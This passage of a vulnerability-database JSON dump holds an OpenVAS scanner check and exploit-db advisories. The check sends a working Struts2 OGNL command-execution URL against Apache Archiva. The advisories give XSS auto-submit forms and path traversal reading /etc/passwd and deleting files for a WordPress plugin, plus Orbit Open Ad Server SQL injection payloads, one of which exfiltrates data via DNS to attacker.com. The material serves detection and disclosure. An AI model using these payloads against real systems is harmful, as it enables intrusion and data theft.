"http://plugins.openvas.org/nasl.php?oid=1361412562310103883", "title": "Apache Archiva Multiple Remote Command Execution Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archivo_rce_01_14.nasl 11867 2018-10-12 10:48:11Z cfischer $\n#\n# Apache Archiva Multiple Remote Command Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:apache:archiva\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103883\");\n script_cve_id(\"CVE-2013-2251\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11867 $\");\n\n script_name(\"Apache Archiva Multiple Remote Command Execution Vulnerabilities\");\n\n\n script_xref(name:\"URL\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/release/2.3.x/docs/s2-016.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-15 18:13:42 +0100 (Wed, 15 Jan 2014)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache_archiva/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will allow remote attackers to execute arbitrary\ncommands within the context of the affected application.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response.\");\n script_tag(name:\"insight\", value:\"Apache Archiva use Apache Struts2:\n'In Struts 2 before 2.3.15.1 the information following 'action:', 'redirect:' or\n'redirectAction:' is not properly sanitized. Since said information will be evaluated as\nOGNL expression against the value stack, this introduces the possibility to inject server\nside code.'\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"summary\", value:\"Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.\");\n script_tag(name:\"affected\", value:\"Apache Archiva <= 1.3.6\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n\nif( ! port = get_app_port(cpe:CPE) ) exit (0);\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit (0);\n\ncmds = exploit_commands();\n\nforeach cmd ( keys( cmds ) )\n{\n url = dir +\n '/security/login.action?redirect:' +\n '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27' +\n cmds[cmd] +\n '%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b)' +\n ',%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23' +\n 'matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23' +\n 'matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';\n\n if( buf = http_vuln_check( port:port, url:url, pattern:cmd, bodyonly:TRUE ) )\n {\n buf = str_replace( string:buf, find:raw_string( 0x00 ), replace:\"\");\n report = 'It was possible to execute the command \"' + cmds[cmd] + '\" on the remote\\nhost which produces the following output:\\n\\n' + buf + '\\n';\n security_message( port:port, data: report );\n exit (0);\n }\n}\n\nexit (99);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in OrbitScripts Orbit Open Ad Server before 1.1.1 allows remote attackers to execute arbitrary SQL commands via the site_directory_sort_field parameter to guest/site_directory.", "modified": "2018-10-09T15:43:30", "published": "2014-04-11T10:55:05", "id": "CVE-2014-2540", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2540", "title": "CVE-2014-2540", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-08-29T10:48:11", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the VideoWhisper Live Streaming Integration plugin before 4.29.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) m parameter to lb_status.php; (2) msg parameter to vc_chatlog.php; n parameter to (3) channel.php, (4) htmlchat.php, (5) video.php, or (6) videotext.php; (7) message parameter to lb_logout.php; or ct parameter to (8) lb_status.php or (9) v_status.php in ls/.", "modified": "2017-08-28T21:34:28", "published": "2014-03-06T10:55:28", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1906", "id": "CVE-2014-1906", "title": "CVE-2014-1906", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T20:08:20", "bulletinFamily": "NVD", "description": "Unrestricted file upload vulnerability in ls/vw_snapshots.php in the VideoWhisper Live Streaming Integration plugin before 4.29.5 for WordPress allows remote attackers to execute arbitrary PHP code by uploading a file with a double extension, and then accessing the file via a direct request to a wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/ pathname, as demonstrated by a .php.jpg filename.", "modified": "2014-12-30T11:37:00", "published": "2014-12-29T15:59:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1905", "id": "CVE-2014-1905", "title": "CVE-2014-1905", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in whizzywig/wb.php in CMSimple Classic 3.54 and earlier, possibly as downloaded before February 26, 2014, allows remote attackers to inject arbitrary web script or HTML via the d parameter.", "modified": "2018-10-09T15:43:12", "published": "2014-03-20T12:55:17", "id": "CVE-2014-2219", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2219", "title": "CVE-2014-2219", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-10T11:05:19", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in library/clicktracker.php in the AdRotate Pro plugin 3.9 through 3.9.5 and AdRotate Free plugin 3.9 through 3.9.4 for WordPress allows remote attackers to execute arbitrary SQL commands via the track parameter.", "modified": "2018-10-09T15:43:00", "published": "2014-02-27T10:55:15", "id": "CVE-2014-1854", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1854", "title": "CVE-2014-1854", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in classes/controller/error.php in Open Classifieds 2 before 2.1.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to shared-apartments-rooms/.", "modified": "2018-10-09T15:43:05", "published": "2014-03-14T10:55:04", "id": "CVE-2014-2024", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2024", "title": "CVE-2014-2024", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in vwrooms\\templates\\logout.tpl.php in the VideoWhisper Webcam plugins for Drupal 7.x allow remote attackers to inject arbitrary web script or HTML via the (1) module or (2) message parameter to index.php.", "modified": "2018-10-09T15:43:34", "published": "2014-04-28T10:09:07", "id": "CVE-2014-2715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2715", "title": "CVE-2014-2715", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-10T11:05:19", "bulletinFamily": "NVD", "description": "OpenDocMan 1.2.7 and earlier does not properly validate allowed actions, which allows remote authenticated users to bypass an intended access restrictions and assign administrative privileges to themselves via a crafted request to signup.php.", "modified": "2018-10-09T15:43:05", "published": "2018-04-10T11:29:00", "id": "CVE-2014-1946", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1946", "title": "CVE-2014-1946", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:20", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in content.aspx in Ektron CMS 8.7 before 8.7.0.055 allows remote authenticated users to inject arbitrary web script or HTML via the category0 parameter, which is not properly handled when displaying the Subjects tab in the View Properties menu option.", "modified": "2018-10-09T15:43:35", "published": "2014-04-25T10:15:30", "id": "CVE-2014-2729", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2729", "title": "CVE-2014-2729", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-09-22T10:41:24", "bulletinFamily": "NVD", "description": "Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.", "modified": "2017-09-21T21:29:00", "published": "2013-07-19T23:37:30", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2251", "id": "CVE-2013-2251", "title": "CVE-2013-2251", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:55:41", "bulletinFamily": "exploit", "description": "Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities. CVE-2014-1905,CVE-2014-1906,CVE-2014-1907,CVE-2014-1908. Webapps exploit for php platform", "modified": "2014-02-28T00:00:00", "published": "2014-02-28T00:00:00", "id": "EDB-ID:31986", "href": "https://www.exploit-db.com/exploits/31986/", "type": "exploitdb", "title": "WordPress VideoWhisper 4.27.3 - Multiple Vulnerabilities", "sourceData": "Advisory ID: HTB23199\r\nProduct: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014\r\nVendor Patch: February 7, 2014\r\nPublic Disclosure: February 27, 2014\r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical\r\nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n\r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n\r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps\r\nhots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system.\r\n\r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n\r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\r\n\r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u00e2??s widget. The script will be also executed in administrative section on the following page:\r\n\r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.p\r\nhp&tab=live\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"u\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatl\r\nog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page.\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/vc_chatlog.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n</form>\r\n</body>\r\n\r\nThe code will be executed when the user visits the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/uploads/[room]/Log[date].html\r\n\r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n\r\n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3\r\nE\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%\r\n3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/sc\r\nript%3E\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logou\r\nt.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/\r\nscript%3E\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status\r\n.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/v_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n\r\n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nin.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below displays contents of \"/etc/passwd\" file:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below deletes a file \"/tmp/immuniweb\":\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n\r\nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system.\r\n\r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n\r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application.\r\n\r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nSolution:\r\n\r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.\r\n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31986/"}, {"lastseen": "2016-02-03T17:48:06", "bulletinFamily": "exploit", "description": "Orbit Open Ad Server 1.1.0 - SQL Injection. CVE-2014-2540. Webapps exploit for php platform", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "EDB-ID:32792", "href": "https://www.exploit-db.com/exploits/32792/", "type": "exploitdb", "title": "Orbit Open Ad Server 1.1.0 - SQL Injection", "sourceData": "Advisory ID: HTB23208\r\nProduct: Orbit Open Ad Server\r\nVendor: OrbitScripts, LLC\r\nVulnerable Version(s): 1.1.0 and probably prior\r\nTested Version: 1.1.0\r\nAdvisory Publication: March 19, 2014 [without technical details]\r\nVendor Notification: March 19, 2014 \r\nVendor Patch: March 21, 2014 \r\nPublic Disclosure: April 9, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-2540\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website.\r\n\r\n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540\r\n\r\nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database:\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Orbit Open Ad Server 1.1.1\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad Server.\r\n[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the profits while we manage the technology.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u017d - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32792/"}, {"lastseen": "2016-02-03T17:37:19", "bulletinFamily": "exploit", "description": "Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability. CVE-2014-2340. Webapps exploit for php platform", "modified": "2014-04-04T00:00:00", "published": "2014-04-04T00:00:00", "id": "EDB-ID:32701", "href": "https://www.exploit-db.com/exploits/32701/", "type": "exploitdb", "title": "WordPress XCloner Plugin 3.1.0 - CSRF Vulnerability", "sourceData": "Advisory ID: HTB23206\r\nProduct: XCloner Wordpress plugin\r\nVendor: XCloner\r\nVulnerable Version(s): 3.1.0 and probably prior\r\nTested Version: 3.1.0\r\nAdvisory Publication: March 12, 2014 [without technical details]\r\nVendor Notification: March 12, 2014 \r\nVendor Patch: March 13, 2014 \r\nPublic Disclosure: April 2, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-2340\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner 